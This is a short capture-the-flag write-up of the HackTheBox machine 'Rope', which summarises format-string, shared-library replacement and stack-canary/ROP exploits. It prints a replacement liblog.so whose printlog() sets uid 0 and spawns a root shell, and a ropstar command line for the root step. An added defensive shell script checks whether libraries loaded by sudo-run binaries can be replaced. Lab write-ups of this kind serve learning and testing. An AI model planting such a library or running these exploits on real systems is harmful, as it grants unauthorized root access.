Rope @ HackTheBox

Rope is a 50-point machine on HackTheBox that involves 3 binary exploits. There is a format string vulnerability in the box's web server and a replaceable shared library used by a binary we can run with sudo. Finally, there is another binary where we have to bypass a stack canary and use ROP.

Notes

The user exploit.

Liblog.so:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Stands in for printlog() in the replaced library. */
void printlog(){
    setuid(0);
    setgid(0);
    system("/bin/sh");
}
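
The user step depends on a library, loaded by a binary that can be run with sudo, being replaceable by a non-root user. A check for that condition, as an added example that is not part of the original post (function names are hypothetical; it assumes Linux stat, readlink and ldd):

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.
# Assumes Linux stat(1), readlink(1) and ldd(1).

# unsafe_path PATH [TRUSTED_UID]: succeeds, printing the reason, when PATH is
# group/world-writable or not owned by TRUSTED_UID (default 0, root).
unsafe_path() {
    up_mode="00$(stat -L -c '%a' "$1")" || return 2
    up_owner=$(stat -L -c '%u' "$1") || return 2
    up_go=${up_mode#"${up_mode%??}"}    # last two octal digits: group, other
    case $up_go in
        [2367]?|?[2367])
            echo "$1: group/world-writable (mode ${up_mode#00})"; return 0 ;;
    esac
    if [ "$up_owner" != "${2:-0}" ]; then
        echo "$1: owned by uid $up_owner, expected ${2:-0}"; return 0
    fi
    return 1
}

# replaceable LIB [TRUSTED_UID]: resolve symlinks, then check the real file
# and the directory that holds it (a writable directory allows a swap too).
replaceable() {
    rp_real=$(readlink -f "$1") || return 2
    unsafe_path "$rp_real" "$2" && return 0
    unsafe_path "$(dirname "$rp_real")" "$2"
}

# audit_binary BIN [TRUSTED_UID]: succeeds if any library BIN loads is
# replaceable. ldd can invoke the target's loader, so run it only on binaries
# you already trust, such as the ones listed in sudoers. Paths with spaces
# are not handled.
audit_binary() {
    ab_hit=1
    for ab_lib in $(ldd "$1" 2>/dev/null |
        awk '$2 == "=>" && $3 ~ /^\// {print $3}; $1 ~ /^\// {print $1}'); do
        replaceable "$ab_lib" "$2" && ab_hit=0
    done
    return "$ab_hit"
}

# Usage: sh audit_libs.sh /path/to/sudo-permitted-binary
if [ $# -gt 0 ]; then
    audit_binary "$1" "${2:-0}" || echo "$1: no replaceable libraries found"
fi
```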

The root exploit.

Solving with ropstar:

python3 ~/tools/ropstar/ropstar.py -rhost localhost -rport 1337 -remote_offset ./contact

Thanks r4j for creating this fun box!

This post is licensed under CC BY 4.0 by the author.